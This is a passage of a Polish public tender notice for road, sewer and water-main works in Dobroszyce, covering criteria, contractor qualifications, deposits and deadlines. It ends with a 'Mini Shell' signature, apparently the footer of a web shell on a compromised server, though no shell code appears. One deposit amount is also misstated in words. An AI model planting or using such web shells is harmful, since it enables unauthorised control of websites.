class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">rękojmia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 4.	Budowa, przebudowa i rozbudowa dróg – ulic Wielkopolnej, Spokojnej, Jasnej i Zacisze w Dobroszycach.<br/>4.1. W ramach zadania należy wykonać przebudowę i rozbudowę ulicy Wielkopolnej o długości ok. 519 m i szerokości 7,00 m, w miejscowości Dobroszyce w zakresie m.in.:<br/>a)	budowy jezdni o nawierzchni bitumicznej,<br/>b)	budowy prawostronnego chodnika o szerokości (netto) 2,00 m z kostki betonowej,<br/>c) budowy zjazdów i dojść do prywatnych posesji z kostki betonowej, <br/>d) wykonania lewostronnego pobocza o szer. 0,75 m z kruszywa,<br/>d) budowy sieci kanalizacji deszczowej z odprowadzeniem ul. Cichą do rowu R-M,<br/>e) budowy kanału technologicznego,<br/>f) budowy oświetlenia ulicznego,<br/>g) urządzenia terenów zielonych,<br/>h) wykonania odcinka sieci kanalizacji sanitarnej o dług. ok. 1,4 m od istniejącej studni nr Si2 do SR2, w działce nr ew. 224/2, zgodnie z dokumentacją projektową, o której mowa w pkt. 5.1.<br/>4.2. W ramach zadania należy wykonać przebudowę ulicy Spokojnej o długości ok. 264 m i szerokości 5,00 m, w miejscowości Dobroszyce w zakresie m.in.:<br/>a)	budowy jezdni o nawierzchni z kostki betonowej,<br/>b)	budowy prawostronnego chodnika o szerokości (netto) 2,00 m z kostki betonowej,<br/>c) budowy zjazdów i dojść do prywatnych posesji z kostki betonowej, <br/>d) wykonania lewostronnego pobocza o szer. 0,75 m z kruszywa,<br/>d) budowy sieci kanalizacji deszczowej z odprowadzeniem ul. Cichą do rowu R-M,<br/>e) budowy kanału technologicznego,<br/>f) urządzenia terenów zielonych.<br/>4.3. W ramach zadania należy wykonać przebudowę ulicy Jasnej o długości ok. 150 m i szerokości 5,00 m, w miejscowości Dobroszyce w zakresie m.in.:<br/>a) budowy jezdni o nawierzchni z kostki betonowej,<br/>b) budowy prawostronnego chodnika o szerokości (netto) 2,00 m z kostki betonowej,<br/>c) budowy zjazdów i dojść do prywatnych posesji z kostki betonowej, <br/>d) wykonania lewostronnego pobocza o szer. 0,75 m z kruszywa,<br/>d) budowy sieci kanalizacji deszczowej z odprowadzeniem ul. Cichą do rowu R-M,<br/>e) budowy kanału technologicznego,<br/>f) urządzenia terenów zielonych,<br/>g) budowy oświetlenia ulicznego.<br/>4.4. W ramach zadania należy wykonać przebudowę ulicy Zacisze o długości ok. 273,00 m i szerokości zmiennej od 3,50 do 5,00 m, w miejscowości Dobroszyce w zakresie m.in.:<br/>a) budowy jezdni o nawierzchni z kostki betonowej,<br/>b) budowy lewostronnego chodnika o szerokości (netto) 2,00 m i placu z kostki betonowej na działce nr ew. gr. 145/3,<br/>c) budowy zjazdów i dojść do prywatnych posesji z kostki betonowej, <br/>d) wykonania lewostronnego pobocza o szer. 0,75 m z kruszywa,<br/>d) budowy sieci kanalizacji deszczowej z odprowadzeniem ul. Cichą do rowu R-M,<br/>e) urządzenia terenu zielonego;<br/>- zgodnie z załączoną dokumentacją projektową. Roboty budowlane należy wykonać na działkach nr ew. 133/1, 133/2, 133/8, 134/10, 135/8, 137/1, 138/1, 139/1, 148/7, 150/4, 150/9, 151/2, 152/11, 153/2, 222/1, 222/2, 222/3, 223/17, 223/26, 223/29, 224/2, 226/11, 226/2, 981/2, 981/6, 1024/3, 1054, 1055,1062, 145/3, 146/2, 154/4, 837/1, 1050, nr działek po podziale gruntów: 130/1, 131/1, 132/1, 225/6, obręb Dobroszyce, gm. Dobroszyce, powiat oleśnicki, woj. dolnośląskie.<br/>Ulice: Wielkopolna, Spokojna, Jasna i Zacisze nie są drogami publicznymi w rozumieniu ustawy z dnia 21 marca 1985r. o drogach publicznych (Dz.U. z 2023r. poz. 645 z późn.zm.).<br/>4.5. Przedmiot zamówienia należy wykonać na podstawie i zgodnie z:<br/>- dokumentacją projektową, <br/>- Specyfikacją Techniczną Wykonania i Odbioru Robót,<br/>- niniejszą SWZ.<br/>5.	Budowa sieci wodociągowej w odcinku ul. Wielkopolnej w Dobroszycach. Przedmiotowy zakres należy wykonać łącznie z zadaniami opisanymi w ust. 4.<br/>W ramach zadania należy wykonać budowę sieci wodociągowej o długości ok. 290,00 m, zgodnie z załączoną dokumentacją projektową. Roboty budowlane należy wykonać na działkach nr ew. 224/2, 223/29, 225/4, 226/11, 1024/3, obręb Dobroszyce, gm. Dobroszyce, powiat oleśnicki, woj. dolnośląskie. Od wybudowanej sieci Ø160 należy wykonać sięgacze Ø125 do granic działek nr ew.: 223/18, 226/12, 1024/24.<br/>Przedmiot zamówienia należy wykonać na podstawie i zgodnie z:<br/>- dokumentacją projektową, <br/>- Specyfikacją Techniczną Wykonania i Odbioru Robót,<br/>- niniejszą SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233253-7 - Roboty w zakresie nawierzchni dróg dla pieszych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">371 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">rękojmia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> - nie podlegają wykluczeniu na podstawie wskazanej w art. 108 ust. 1, art. 109 ust. 1 pkt 4 i pkt 7 PZP oraz w art. 7 ustawy z dnia 13 kwietnia 2022r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. z 2024r. poz. 507);<br/>- spełniają następujące, określone przez Zamawiającego warunki udziału w postępowaniu:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Wykonawca spełnia warunek jeśli wykaże, że prowadząc działalność gospodarczą lub zawodową jest wpisany do jednego z rejestrów zawodowych lub handlowych prowadzonych w kraju, w którym ma siedzibę lub miejsce zamieszkania, jeżeli taki wpis jest wymagany przepisami;<br/>Zamawiający nie precyzuje w tym zakresie wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. <br/>2) sytuacji ekonomicznej lub finansowej: <br/>Wykonawca spełni warunek jeżeli wykaże że jest:<br/>- UBEZPIECZONY OD ODPOWIEDZIALNOŚCI CYWILNEJ w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę ubezpieczenia określoną przez Zamawiającego tj. nie niższą niż 1.000.000,00 zł. (słownie: jeden milion 00/100 złotych) dla każdego z zadań, na które Wykonawca składa ofertę. <br/>3) w zakresie zdolności technicznej lub zawodowej: <br/>I.	dla zadania nr 1 pn. „Przebudowa ulicy Owocowej w Dobroszycach”<br/>a) Wykonawca spełni warunek udziału w postępowaniu w zakresie zdolności technicznej, jeżeli wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał:<br/>- co najmniej dwa zadania o charakterze i złożoności porównywalnej z robotami stanowiącymi przedmiot zamówienia, tj.: związane z budową, przebudową drogi publicznej o nawierzchni z kostki betonowej, <br/>b) Wykonawca spełni warunek udziału w postępowaniu w zakresie zdolności zawodowej, jeżeli będzie dysponował:<br/>- Kierownikiem budowy posiadającym:<br/>1) uprawnienia budowlane do kierowania robotami budowlanymi w specjalności inżynieryjnej drogowej wydane zgodnie z ustawą z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (Dz. U. z 2023 r. poz. 551) - zgodnie z rozdziałem X SWZ <br/>Uprawnienia do pełnienia samodzielnych funkcji w budownictwie, o których mowa powyżej, powinny być zgodne z ustawą Prawo budowlane.<br/>2) doświadczenie w kierowaniu co najmniej 2 robotami budowlanymi w zakresie budowy lub przebudowy drogi o nawierzchni z kostki betonowej.<br/><br/>II.	dla zadania nr 2 pn. „Przebudowa i rozbudowa ulicy Łąkowej w Dobroszycach”<br/>a) Wykonawca spełni warunek udziału w postępowaniu w zakresie zdolności technicznej, jeżeli wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał:<br/>- co najmniej dwa zadania o charakterze i złożoności porównywalnej z robotami stanowiącymi przedmiot zamówienia, tj.: związane z budową, przebudową drogi publicznej o nawierzchni z kostki betonowej wraz z oświetleniem drogowym i kanalizacją deszczową, <br/>b) Wykonawca spełni warunek udziału w postępowaniu w zakresie zdolności zawodowej, jeżeli będzie dysponował:<br/>- Kierownikiem budowy posiadającym:<br/>1) uprawnienia budowlane do kierowania robotami budowlanymi w specjalności inżynieryjnej drogowej wydane zgodnie z ustawą z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (Dz. U. z 2023 r. poz. 551) - zgodnie z rozdziałem X SWZ. <br/>Uprawnienia do pełnienia samodzielnych funkcji w budownictwie, o których mowa powyżej, powinny być zgodne z ustawą Prawo budowlane.<br/>2) doświadczenie w kierowaniu co najmniej 2 robotami budowlanymi w zakresie budowy lub przebudowy drogi o nawierzchni z kostki betonowej.<br/>- kierownikiem robót posiadającym:<br/>1) uprawnienia budowlane do kierowania robotami budowlanymi w specjalności sanitarnej w zakresie sieci kanalizacyjnych wydane zgodnie z ustawą z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (Dz. U. z 2023 r. poz. 551)- zgodnie z rozdziałem X SWZ. <br/>Uprawnienia do pełnienia samodzielnych funkcji w budownictwie, o których mowa powyżej, powinny być zgodne z ustawą Prawo budowlane.<br/>- kierownikiem robót posiadającym:<br/>1) uprawnienia budowlane do kierowania robotami budowlanymi w specjalności elektrycznej i elektroenergetycznej wydane zgodnie z ustawą z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (Dz. U. z 2023 r. poz. 551) - zgodnie z rozdziałem X SWZ. <br/>Uprawnienia do pełnienia samodzielnych funkcji w budownictwie, o których mowa powyżej, powinny być zgodne z ustawą Prawo budowlane.<br/>III.	dla zadania nr 3 pn. „Modernizacja drogi powiatowej nr 1475D w relacji Strzelce – Sadków – Łuczyna”<br/>a) Wykonawca spełni warunek udziału w postępowaniu w zakresie zdolności technicznej, jeżeli wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał:<br/>- co najmniej dwa zadania o charakterze i złożoności porównywalnej z robotami stanowiącymi przedmiot zamówienia, tj.: związane z budową, przebudową remontem drogi publicznej o nawierzchni bitumicznej o długości co najmniej 2 km, <br/>b) Wykonawca spełni warunek udziału w postępowaniu w zakresie zdolności zawodowej, jeżeli będzie dysponował:<br/>- Kierownikiem budowy posiadającym:<br/>1) uprawnienia budowlane do kierowania robotami budowlanymi w specjalności inżynieryjnej drogowej wydane zgodnie z ustawą z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (Dz. U. z 2023 r. poz. 551) - zgodnie z rozdziałem X SWZ.<br/>Uprawnienia do pełnienia samodzielnych funkcji w budownictwie, o których mowa powyżej, powinny być zgodne z ustawą Prawo budowlane.<br/>2) doświadczenie w kierowaniu co najmniej 2 robotami budowlanymi w zakresie budowy, przebudowy lub remontu drogi o nawierzchni bitumicznej o długości co najmniej 2 km.<br/>IV.	dla zadania nr 4 i 5 pn. „Budowa, przebudowa i rozbudowa dróg – ulic Wielkopolnej, Spokojnej, Jasnej i Zacisze w Dobroszycach” i „Budowa sieci wodociągowej w odcinku ul. Wielkopolnej”<br/>a) Wykonawca spełni warunek udziału w postępowaniu w zakresie zdolności technicznej, jeżeli wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał:<br/>- co najmniej dwa zadania o charakterze i złożoności porównywalnej z robotami stanowiącymi przedmiot zamówienia, tj.: związane z budową, przebudową drogi publicznej o nawierzchni z kostki betonowej wraz z oświetleniem drogowym i kanalizacją deszczową i co najmniej dwa zadania związane z budową, przebudową drogi publicznej o nawierzchni bitumicznej wraz z oświetleniem drogowym i kanalizacją deszczową<br/>b) Wykonawca spełni warunek udziału w postępowaniu w zakresie zdolności zawodowej, jeżeli będzie dysponował:<br/>- Kierownikiem budowy posiadającym:<br/>1) uprawnienia budowlane do kierowania robotami budowlanymi w specjalności inżynieryjnej drogowej wydane zgodnie z ustawą z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (Dz. U. z 2023 r. poz. 551) - zgodnie z rozdziałem X SWZ.<br/>Uprawnienia do pełnienia samodzielnych funkcji w budownictwie, o których mowa powyżej, powinny być zgodne z ustawą Prawo budowlane.<br/>2) doświadczenie w kierowaniu co najmniej 2 robotami budowlanymi w zakresie budowy lub przebudowy drogi o nawierzchni z kostki betonowej i co najmniej 2 robotami budowlanymi w zakresie budowy lub przebudowy drogi o nawierzchni bitumicznej.<br/>- kierownikiem robót posiadającym:<br/>1) uprawnienia budowlane do kierowania robotami budowlanymi w specjalności sanitarnej w zakresie sieci kanalizacyjnych i sieci wodociągowych wydane zgodnie z ustawą z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (Dz. U. z 2023 r. poz. 551) - zgodnie z rozdziałem X SWZ. <br/>Uprawnienia do pełnienia samodzielnych funkcji w budownictwie, o których mowa powyżej, powinny być zgodne z ustawą Prawo budowlane.<br/>- kierownikiem robót posiadającym:<br/>1) uprawnienia budowlane do kierowania robotami budowlanymi w specjalności elektrycznej i elektroenergetycznej wydane zgodnie z ustawą z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (Dz. U. z 2023 r. poz. 551) - zgodnie z rozdziałem X SWZ. <br/>Uprawnienia do pełnienia samodzielnych funkcji w budownictwie, o których mowa powyżej, powinny być zgodne z ustawą Prawo budowlane. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.Wykonawca zobowiązany jest wnieść wadium w kwocie:<br/>- 7 000,00 zł (słownie: siedem tysięcy złotych 00/100) - dla zadania nr 1 pn. „Przebudowa ulicy Owocowej w Dobroszycach”,<br/>- 19.000,00 zł (słownie: dziewiętnaście tysięcy złotych 00/100) - dla zadania nr 2 pn. „Przebudowa i rozbudowa ulicy Łąkowej w Dobroszycach”,<br/>- 72.000,00 zł (słownie: siedemdziesiąt dwa tysiące złotych 00/100) – dla zadania nr 3 pn. „Modernizacja drogi powiatowej nr 1475D w relacji Strzelce – Sadków – Łuczyna”,<br/>- 88.000,00 zł (słownie: siedemdziesiąt dwa tysiące złotych 00/100) – dla zadania nr 4, 5 pn. „Budowa, przebudowa i rozbudowa dróg – ulic Wielkopolnej, Spokojnej, Jasnej i Zacisze w Dobroszycach” i „Budowa sieci wodociągowej w odcinku ul. Wielkopolnej”.<br/>- przed upływem terminu składania ofert; <br/>2. Wadium może być wniesione w:<br/>1) pieniądzu;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2023 r. poz. 462).<br/>Wadium w pieniądzu należy wnieść przelewem na konto Zamawiającego w Banku Spółdzielczym Oleśnica, o/Dobroszyce nr rachunku 09 9584 1034 2004 0400 3001 0001, z dopiskiem na przelewie: <br/>- dla zadania nr 1: „Wadium w postępowaniu ZP.271.46.2024, Zadanie pn. Przebudowa ulicy Owocowej w Dobroszycach.”<br/>- dla zadania nr 2: „Wadium w postępowaniu ZP.271.46.2024, Zadanie pn. Przebudowa i rozbudowa ulicy Łąkowej w Dobroszycach.”<br/>- dla zadania nr 3: „Wadium w postępowaniu ZP.271.46.2024, Zadanie pn. Modernizacja drogi powiatowej nr 1475D w relacji Strzelce – Sadków – Łuczyna”<br/>- dla zadań nr 4 i 5: „Wadium w postępowaniu ZP.271.46.2024, Zadania pn. Budowa, przebudowa i rozbudowa dróg – ulic Wielkopolnej, Spokojnej, Jasnej i Zacisze w Dobroszycach” i „Budowa sieci wodociągowej w odcinku ul. Wielkopolnej”.<br/>UWAGA: Za termin wniesienia wadium w pieniądzu zostanie przyjęty termin uznania rachunku Zamawiającego pełną kwotą wymaganego wadium. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Projektowane postanowienia umowy w sprawie zamówienia publicznego, które zostaną wprowadzone do treści tej umowy, określone zostały w załączniku nr 2 do SWZ.<br/>2. Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 454 PZP oraz wskazanym zgodnie z art. 455 ust. 1 pkt 1 PZP we Wzorze Umowy, stanowiącym załącznik nr 2 do SWZ. Ponadto dopuszczalna jest zmiana umowy w okolicznościach i na warunkach wskazanych w art. 455 ust. 1 pkt 2 – 4, ust. 3 i 4.<br/>3. Zmiana umowy wymaga dla swej ważności, zachowania formy pisemnej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-08-08 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-08-08 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-09-06</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <p class="mb-0">Część 3 : <span class="normal">Tak</span></p> <p class="mb-0">Część 4 : <span class="normal">Tak</span></p> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">3</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com